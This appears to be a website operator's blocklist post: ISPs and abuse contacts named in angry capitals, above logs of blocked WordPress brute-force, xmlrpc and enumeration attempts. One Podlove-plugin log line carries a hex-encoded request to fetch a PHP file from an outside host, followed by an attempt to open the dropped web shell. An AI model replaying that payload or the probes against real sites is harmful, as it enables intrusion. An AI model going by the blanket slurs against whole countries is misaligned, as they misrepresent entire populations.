AS262729 – Telemidia Sistema de Telecomunicacao Ltda – VERY UNWANTED AND IGNORANT! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
WE BLOCK ALSO IGNORANT ISP WITH HACKER-IDIOTS COMPLETE!
WE REPORT THIS SINCE MONTHS! THIS PROVIDER DOES NOTHING!!!
NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
186.193.140.158 www.website.*.com – – [11/Oct/2025:13:51:37 +0200] „GET /wp-login.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36“
186.193.140.158 www.website.*.com – – [11/Oct/2025:13:51:38 +0200] „POST /wp-login.php HTTP/1.0“ 403 – „https://www.website.*.com/wp-login.php“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36“

AS46606 – Unified Layer – VERY UNWANTED AND IGNORANT! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
HERE WITH 2 IP´S!
WE REPORT THIS SINCE MONTHS! THIS PROVIDER DOES NOTHING!!!
NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
162.240.238.172 www.website.*.com – – [11/Oct/2025:14:15:33 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „-“ „Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; GWX:QUALIFIED)“
162.240.238.172 www.website.*.com – – [11/Oct/2025:14:15:57 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „-“ „Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; GWX:QUALIFIED)“
162.240.238.172 www.website.*.com – – [11/Oct/2025:14:16:22 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „-“ „Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; GWX:QUALIFIED)“
162.240.238.172 www.website.*.com – – [11/Oct/2025:14:16:51 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „-“ „Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; GWX:QUALIFIED)“
162.240.238.172 www.website.*.com – – [11/Oct/2025:14:17:08 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „-“ „Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; GWX:QUALIFIED)“
162.240.238.172 www.website.*.com – – [11/Oct/2025:14:17:40 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „-“ „Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; GWX:QUALIFIED)“
+
162.240.178.114 www.website.*.com – – [11/Oct/2025:21:28:51 +0200] „GET /wp-login.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; Touch; MDDCJS; rv:11.0) like Gecko“
162.240.178.114 www.website.*.com – – [11/Oct/2025:21:28:53 +0200] „POST /wp-login.php HTTP/1.0“ 403 – „https://www.website.*.com/wp-login.php“ „Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; Touch; MDDCJS; rv:11.0) like Gecko“

ABUSE-MAIL NR. 11 – WEEKEND!

info@fasthosting.net.za,abuse@cheapy.host,abuse_contact@mail.ru,abuse@k-telecom.org

AS211138 – Private-Hosting di Cipriano oscar – VERY UNWANTED AND VERY IGNORANT! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
WE REPORT THIS SINCE MONTHS! THIS PROVIDER DOES NOTHING!!!
NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
41.216.188.95 website.*.com – – [11/Oct/2025:11:44:14 +0200] „GET /index.php?podlove_image_cache_url=68747470733a2f2f7261636f6f6e6c61622e746f702f6769662f6769662e706870&podlove_file_name=ewrdhurl HTTP/1.0“ 302 20 „www.google.com“ „Mozilla/6.4 (Windows NT 11.1) Gecko/2010102 Firefox/99.0“
41.216.188.95 website.*.com – – [11/Oct/2025:11:44:19 +0200] „GET /wp-content/cache/podlove/1f/8acb754d52d40ce9457fddc2b9710a/ewrdhurl_original.php?up=1 HTTP/1.0“ 403 – „www.google.com“ „Mozilla/6.4 (Windows NT 11.1) Gecko/2010102 Firefox/99.0“

AS401120 – cheapy.host LLC – VERY UNWANTED AND VERY IGNORANT! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
ABUSE-MAIL 4 FROM WEEKEND!!! – WE REPORT THIS SINCE MONTHS! THIS PROVIDER DOES NOTHING!!!
NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
196.251.86.100 website.*.com – – [11/Oct/2025:11:59:11 +0200] „GET //wp-content/plugins/fix/up.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36“

AS48642 – Joint stock company For – VERY UNWANTED PROVIDER! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
RUSSIA IS VERY UNWANTED AND UNSECURE, COMPLETE BLOCKED! – TO MANY HACKER-IDIOTS EVERY DAY!!!
NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
82.112.42.189 website.*.com – – [11/Oct/2025:16:54:22 +0200] „GET /wp-content/plugins/wp-automatic/css/style.css HTTP/1.0“ 403 – „-“ „curl/8.12.1“

ABUSE-MAIL NR. 12 – WEEKEND!

abuse@ovh.net, abuse@ovh.us, abuse@ovh.ca,abuse@ipxo.com, abuse@contabo.de, noc@contabo.de, sascha.wintz@contabo.de, yennp@viettel.com.vn,admin@buctbd.com

AS16276 – OVH SAS – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
ONE AUTOMATIC ANSWER – ABUSE PER EMAIL IS STANDARD!
148.113.1.176 www.website.*.com – – [11/Oct/2025:14:23:59 +0200] „GET /wp-login.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/604.5.6 (KHTML, like Gecko) Version/11.0.3 Safari/604.5.6“
148.113.1.176 www.website.*.com – – [11/Oct/2025:14:24:02 +0200] „POST /wp-login.php HTTP/1.0“ 403 – „https://www.website.*.com/wp-login.php“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/604.5.6 (KHTML, like Gecko) Version/11.0.3 Safari/604.5.6“

AS40021 – Contabo Inc. – VERY UNWANTED AND VERY IGNORANT! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
207.244.241.152 www.website.*.com – – [11/Oct/2025:16:03:13 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „-“ „Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; GWX:QUALIFIED)“
207.244.241.152 www.website.*.com – – [11/Oct/2025:16:03:18 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „-“ „Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; GWX:QUALIFIED)“
207.244.241.152 www.website.*.com – – [11/Oct/2025:16:03:23 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „-“ „Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; GWX:QUALIFIED)“
207.244.241.152 www.website.*.com – – [11/Oct/2025:16:03:31 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „-“ „Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; GWX:QUALIFIED)“
207.244.241.152 www.website.*.com – – [11/Oct/2025:16:03:38 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „-“ „Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; GWX:QUALIFIED)“

AS38623 – ISP/IXP IN CAMBODIA WITH THE BEST VERVICE IN THERE. – VERY UNWANTED AND VERY IGNORANT! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
220.158.232.73 www.website.*.com – – [11/Oct/2025:16:45:09 +0200] „GET /wp-login.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/603.3.8 (KHTML, like Gecko) Version/10.1.2 Safari/603.3.8“
220.158.232.73 www.website.*.com – – [11/Oct/2025:16:45:21 +0200] „POST /wp-login.php HTTP/1.0“ 403 – „https://www.website.*.com/wp-login.php“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/603.3.8 (KHTML, like Gecko) Version/10.1.2 Safari/603.3.8“

ABUSE-MAIL NR. 13 – WEEKEND!

abuse@invitesys.ro,info@fasthosting.net.za,noyobzoda.far@outlook.com

INVITE Systems – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
HERE WITH 2 IP´S!!! – STOP THIS PENETRANT IDIOT NOW!!!
84.239.41.208 website.*.com – – [11/Oct/2025:22:07:03 +0200] „GET /robots.txt HTTP/1.0“ 403 – „-“ „panscient.com“
84.239.41.208 website.*.com – – [11/Oct/2025:22:07:07 +0200] „GET / HTTP/1.0“ 403 – „-“ „panscient.com“
84.239.41.208 website.*.com – – [11/Oct/2025:22:07:26 +0200] „GET /robots.txt HTTP/1.0“ 403 – „-“ „panscient.com“
84.239.41.208 website.*.com – – [11/Oct/2025:22:07:27 +0200] „GET / HTTP/1.0“ 403 – „-“ „panscient.com“
84.239.41.208 website.*.com – – [11/Oct/2025:22:07:29 +0200] „GET /robots.txt HTTP/1.0“ 403 – „-“ „panscient.com“
84.239.41.208 website.*.com – – [11/Oct/2025:22:07:32 +0200] „GET / HTTP/1.0“ 403 – „-“ „panscient.com“
84.239.41.208 website.*.com – – [11/Oct/2025:22:07:46 +0200] „GET / HTTP/1.0“ 403 – „-“ „panscient.com“
84.239.41.208 website.*.com – – [11/Oct/2025:22:07:48 +0200] „GET / HTTP/1.0“ 403 – „-“ „panscient.com“
84.239.41.208 website.*.com – – [11/Oct/2025:22:07:51 +0200] „GET /robots.txt HTTP/1.0“ 403 – „-“ „panscient.com“
84.239.41.208 website.*.com – – [11/Oct/2025:22:07:55 +0200] „GET / HTTP/1.0“ 403 – „-“ „panscient.com“
84.239.41.208 website.*.com – – [11/Oct/2025:22:08:39 +0200] „GET / HTTP/1.0“ 403 – „-“ „panscient.com“
+
84.239.45.150 www.website.*.com – – [11/Oct/2025:21:09:09 +0200] „GET /robots.txt HTTP/1.0“ 403 – „-“ „panscient.com“
84.239.45.150 www.website.*.com – – [11/Oct/2025:21:09:11 +0200] „GET / HTTP/1.0“ 403 – „-“ „panscient.com“
84.239.45.150 www.website.*.com – – [11/Oct/2025:21:09:23 +0200] „GET /robots.txt HTTP/1.0“ 403 – „-“ „panscient.com“
84.239.45.150 www.website.*.com – – [11/Oct/2025:21:09:23 +0200] „GET / HTTP/1.0“ 403 – „-“ „panscient.com“
84.239.45.150 www.website.*.com – – [11/Oct/2025:21:10:15 +0200] „GET /robots.txt HTTP/1.0“ 403 – „-“ „panscient.com“
84.239.45.150 www.website.*.com – – [11/Oct/2025:21:10:17 +0200] „GET / HTTP/1.0“ 403 – „-“ „panscient.com“
84.239.45.150 www.website.*.com – – [11/Oct/2025:21:10:38 +0200] „GET /robots.txt HTTP/1.0“ 403 – „-“ „panscient.com“
84.239.45.150 www.website.*.com – – [11/Oct/2025:21:10:44 +0200] „GET / HTTP/1.0“ 403 – „-“ „panscient.com“
84.239.45.150 www.website.*.com – – [11/Oct/2025:21:11:27 +0200] „GET /robots.txt HTTP/1.0“ 403 – „-“ „panscient.com“
84.239.45.150 www.website.*.com – – [11/Oct/2025:21:11:28 +0200] „GET / HTTP/1.0“ 403 – „-“ „panscient.com“
84.239.45.150 www.website.*.com – – [11/Oct/2025:21:11:53 +0200] „GET /robots.txt HTTP/1.0“ 403 – „-“ „panscient.com“
84.239.45.150 www.website.*.com – – [11/Oct/2025:21:11:57 +0200] „GET / HTTP/1.0“ 403 – „-“ „panscient.com“
84.239.45.150 www.website.*.com – – [11/Oct/2025:21:11:59 +0200] „GET /robots.txt HTTP/1.0“ 403 – „-“ „panscient.com“
84.239.45.150 www.website.*.com – – [11/Oct/2025:21:12:02 +0200] „GET / HTTP/1.0“ 403 – „-“ „panscient.com“

AS211138 – Private-Hosting di Cipriano oscar – VERY UNWANTED AND VERY IGNORANT! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
WE REPORT THIS SINCE MONTHS! THIS PROVIDER DOES NOTHING!!!
NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
41.216.188.205 website.*.com – – [11/Oct/2025:22:19:36 +0200] „GET /wp-login.php HTTP/1.0“ 403 – „https://www.bing.com/“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) Gecko/20100101 Firefox/119.0.1“
41.216.188.205 website.*.com – – [11/Oct/2025:22:19:36 +0200] „GET /wp-login.php HTTP/1.0“ 403 – „https://www.bing.com/“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.57 Safari/537.36“
41.216.188.205 website.*.com – – [11/Oct/2025:22:19:36 +0200] „GET /wp-admin/ HTTP/1.0“ 403 – „https://www.linkedin.com/“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 13_6_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2.1 Safari/605.1.15“

AS208885 – Noyobzoda Faridduni Saidilhom – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
WE BLOCK ALSO ISP WITH HACKER-IDIOTS COMPLETE!
MAIL IS OUT, WE´RE WAITING FOR ANSWER!!!
86.54.24.140 website.*.com – – [12/Oct/2025:12:30:24 +0200] „GET /wp-json/wp/v2/users HTTP/1.0“ 403 – „https://www.google.com“ „Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36“
86.54.24.140 website.*.com – – [12/Oct/2025:12:30:24 +0200] „GET /?author=1 HTTP/1.0“ 403 – „https://www.google.com“ „Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36“
86.54.24.140 website.*.com – – [12/Oct/2025:12:30:24 +0200] „GET /wp-json/wp/v2/users HTTP/1.0“ 403 – „https://www.google.com“ „Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36“
86.54.24.140 website.*.com – – [12/Oct/2025:12:30:24 +0200] „GET /?author=1 HTTP/1.0“ 403 – „https://www.google.com“ „Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36“
86.54.24.140 website.*.com – – [12/Oct/2025:12:30:24 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „-“ „Apache-HttpClient/4.5.13 (Java/11.0.28)“
86.54.24.140 website.*.com – – [12/Oct/2025:12:30:25 +0200] „GET /wp-login.php HTTP/1.0“ 403 – „https://www.google.com“ „Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36“
86.54.24.140 website.*.com – – [12/Oct/2025:12:30:25 +0200] „GET /wp-login.php HTTP/1.0“ 403 – „https://www.google.com“ „Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36“
86.54.24.140 website.*.com – – [12/Oct/2025:12:30:25 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „-“ „Apache-HttpClient/4.5.13 (Java/11.0.28)“
86.54.24.140 website.*.com – – [12/Oct/2025:12:30:26 +0200] „GET /wp-login.php HTTP/1.0“ 403 – „https://www.google.com“ „Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36“
86.54.24.140 website.*.com – – [12/Oct/2025:12:30:26 +0200] „GET /wp-login.php HTTP/1.0“ 403 – „https://www.google.com“ „Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36“

ABUSE-MAIL NR. 14 – WEEKEND!

hm-changed@vnnic.vn,domain@inet.vn,hainm@inet.vn,info@zhost.vn,abuse@multinet.com.pk,ip.core@multinet.com.pk,ip.noc@multinet.com.pk

AS135905 – VIETNAM POSTS AND TELECOMMUNICATIONS GROUP – VERY UNWANTED AND IGNORANT! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
WE BLOCK ALSO IGNORANT ISP WITH HACKER-IDIOTS COMPLETE!
VIETNAM IS VERY UNWANTED AND UNSECURE, COMPLETE BLOCKED! – TO MANY HACKER-IDIOTS EVERY DAY!!!
WE REPORT THIS SINCE MONTHS! THIS PROVIDER DOES NOTHING!!!
hm-changed@vnnic.vn – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
103.56.160.10 www.website.*.com – – [11/Oct/2025:17:47:48 +0200] „GET /wp-login.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/603.3.8 (KHTML, like Gecko) Version/10.1.2 Safari/603.3.8“
103.56.160.10 www.website.*.com – – [11/Oct/2025:17:47:52 +0200] „POST /wp-login.php HTTP/1.0“ 403 – „https://www.website.*.com/wp-login.php“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/603.3.8 (KHTML, like Gecko) Version/10.1.2 Safari/603.3.8“

AS38732 – CMC Telecom Infrastructure Company – VERY UNWANTED AND VERY IGNORANT! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
WE BLOCK ALSO IGNORANT ISP WITH HACKER-IDIOTS COMPLETE!
VIETNAM IS VERY UNWANTED AND UNSECURE, COMPLETE BLOCKED! – TO MANY HACKER-IDIOTS EVERY DAY!!!
WE REPORT THIS SINCE MONTHS! THIS PROVIDER DOES NOTHING!!!
NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
103.152.165.148 www.website.*.com – – [11/Oct/2025:18:11:58 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „-“ „Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; GWX:QUALIFIED)“
103.152.165.148 www.website.*.com – – [11/Oct/2025:18:12:00 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „-“ „Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; GWX:QUALIFIED)“
103.152.165.148 www.website.*.com – – [11/Oct/2025:18:12:02 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „-“ „Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; GWX:QUALIFIED)“
103.152.165.148 www.website.*.com – – [11/Oct/2025:18:12:03 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „-“ „Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; GWX:QUALIFIED)“
103.152.165.148 www.website.*.com – – [11/Oct/2025:18:12:05 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „-“ „Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; GWX:QUALIFIED)“
103.152.165.148 www.website.*.com – – [11/Oct/2025:18:12:07 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „-“ „Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; GWX:QUALIFIED)“

AS9260 – Multinet Pakistan Pvt. Ltd. – VERY UNWANTED AND VERY IGNORANT! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
WE BLOCK ALSO IGNORANT ISP WITH HACKER-IDIOTS COMPLETE!
PAKISTAN IS VERY UNWANTED AND UNSECURE, COMPLETE BLOCKED! – TO MANY HACKER-IDIOTS EVERY DAY!!!
WE REPORT THIS SINCE WEEKS! THIS PROVIDER DOES NOTHING!!!
202.142.184.234 www.website.*.com – – [11/Oct/2025:18:19:10 +0200] „GET /wp-login.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/604.5.6 (KHTML, like Gecko) Version/11.0.3 Safari/604.5.6“
202.142.184.234 www.website.*.com – – [11/Oct/2025:18:19:10 +0200] „POST /wp-login.php HTTP/1.0“ 403 – „https://www.website.*.com/wp-login.php“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/604.5.6 (KHTML, like Gecko) Version/11.0.3 Safari/604.5.6“

ABUSE-MAIL NR. 15 – WEEKEND!

info@fasthosting.net.za,ip.abuse@ril.com,IARPOC@Newfold.com,abuse@unifiedlayer.com,abuse@timeweb.ru

AS211138 – Private-Hosting di Cipriano oscar – VERY UNWANTED AND VERY IGNORANT! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
HACKER-IDIOTS AGAIN AND AGAIN FROM THIS PROVIDER!!!
WE REPORT THIS SINCE MONTHS! THIS PROVIDER DOES NOTHING!!!
NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
41.216.188.205 website.*.com – – [11/Oct/2025:20:48:48 +0200] „GET /wp-login.php HTTP/1.0“ 403 – „https://www.bing.com/“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 12_6_2) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1 Safari/605.1.15“
41.216.188.205 website.*.com – – [11/Oct/2025:20:48:48 +0200] „GET /wp-login.php HTTP/1.0“ 403 – „https://www.facebook.com/“ „Mozilla/5.0 (Windows NT 11.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36“
41.216.188.205 website.*.com – – [11/Oct/2025:20:48:48 +0200] „GET /wp-admin/ HTTP/1.0“ 403 – „https://www.facebook.com/“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36 Edg/121.0.2277.83“

AS55836 – Reliance Jio Infocomm Limited – VERY UNWANTED AND VERY IGNORANT! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
HACKER-IDIOTS AGAIN AND AGAIN FROM THIS PROVIDER!!!
WE BLOCK ALSO IGNORANT ISP WITH HACKER-IDIOTS COMPLETE!
WE REPORT THIS SINCE MONTHS! THIS PROVIDER DOES NOTHING!!!
NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
115.245.68.134 www.website.*.com – – [11/Oct/2025:20:50:34 +0200] „GET /wp-login.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36“
115.245.68.134 www.website.*.com – – [11/Oct/2025:20:50:37 +0200] „POST /wp-login.php HTTP/1.0“ 403 – „https://www.website.*.com/wp-login.php“ „Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36“

AS46606 – Unified Layer – VERY UNWANTED AND VERY IGNORANT! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
IARPOC@Newfold.com – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
162.240.178.114 www.website.*.com – – [11/Oct/2025:21:28:51 +0200] „GET /wp-login.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; Touch; MDDCJS; rv:11.0) like Gecko“
162.240.178.114 www.website.*.com – – [11/Oct/2025:21:28:53 +0200] „POST /wp-login.php HTTP/1.0“ 403 – „https://www.website.*.com/wp-login.php“ „Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; Touch; MDDCJS; rv:11.0) like Gecko“

AS9123 – JSC TIMEWEB – VERY UNWANTED AND UNSECURE! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
RUSSIA IS VERY UNWANTED AND UNSECURE, COMPLETE BLOCKED! – TO MANY HACKER-IDIOTS EVERY DAY!!!
185.200.240.65 www.website.*.com – – [11/Oct/2025:23:02:14 +0200] „GET /wp-login.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Safari/604.1.38“
185.200.240.65 www.website.*.com – – [11/Oct/2025:23:02:15 +0200] „POST /wp-login.php HTTP/1.0“ 403 – „https://www.website.*.com/wp-login.php“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Safari/604.1.38“

ABUSE-MAIL NR. 16 – WEEKEND!

abuse@telekom.hu,hm-changed@vnnic.vn,noc@runsystem.net,noc@tenten.vn,abuse@ipxo.com, abuse@contabo.de, noc@contabo.de, sascha.wintz@contabo.de

AS5483 – Magyar Telekom Plc. – VERY UNWANTED AND VERY IGNORANT! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
WE BLOCK ALSO IGNORANT ISP WITH HACKER-IDIOTS COMPLETE!
NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
2001:4c4c:14d6:f100:6d63:23d9:78ce:39d6 website.*.de – – [11/Oct/2025:22:10:18 +0200] „POST /xmlrpc.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36“

AS131392 – GMO-Z.com Runsystem Joint Stock Company – VERY UNWANTED AND VERY IGNORANT! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
VIETNAM IS VERY UNWANTED AND UNSECURE, COMPLETE BLOCKED! – TO MANY HACKER-IDIOTS EVERY DAY!!!
